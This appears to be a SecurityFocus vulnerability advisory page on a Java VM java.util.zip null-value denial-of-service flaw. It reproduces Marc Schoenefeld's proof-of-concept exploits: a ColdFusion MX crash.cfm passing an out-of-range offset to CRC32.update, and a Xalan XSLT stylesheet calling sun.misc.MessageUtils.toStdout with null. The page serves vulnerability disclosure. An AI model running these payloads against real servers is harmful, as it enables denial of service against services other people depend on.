Multiple Vendor Java Virtual Machine java.util.zip Null Value Denial Of Service Vulnerability

Sample exploit code was provided by Marc Schoenefeld. Further details are available in the referenced message.

A new exploit program has been released by Marc Schoenefeld, which will trigger a denial of service against Lotus Notes and Domino applications.

The following cfm will cause Macromedia ColdFusin MX to fail:

- ------------------crash.cfm-------------------------
<!H1> Coldfusion MX crash with Java <!/h1>
<!h2> Marc Schoenefeld @ illegalaccess.org <!/h2>

<!cfapplication name="Marc" sessionmanagement="yes">


<!cfobject action="create" type="Java" class="java.lang.String" name="s">
<!cfobject action="create" type="Java" class="java.util.zip.CRC32" name="c">
<!cfset ret=s.init()>
<!cfset ret=c.init()>
<!cfset str = s.getBytes()>
<!cfset retval = c.update(str,2147483647,4)>
- ------------------crash.cfm-------------------------


The following proof of concept has been submitted and demonstrates the use of injectable xsl templates, to exploit this issue.

c:\java\1.4.2\00\jre\bin\java org.apache.xalan.xslt.Process -IN a.xml -xsl
sunexploit.xsl


Used Files:

===================a.xml===========================
(a/)
===================a.xml===========================


===========sunexploit.xsl=============================
(!-- XSLT JDK-Exploit by Marc Schoenefeld , marc@at@illegalaccess.org --)
(xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:sun="sun")
(xsl:template match="/")
(xsl:variable name="tmp"
select="sun:misc.MessageUtils.toStdout(null)"/)
(xsl:variable name="tmp2"
select="sun:misc.MessageUtils.toStdout($tmp)"/)
(xsl:value-of select="$tmp2" /)
(/xsl:template)
(/xsl:stylesheet)
===========sunexploit.xsl=============================


 

Privacy Statement
Copyright 2010, SecurityFocus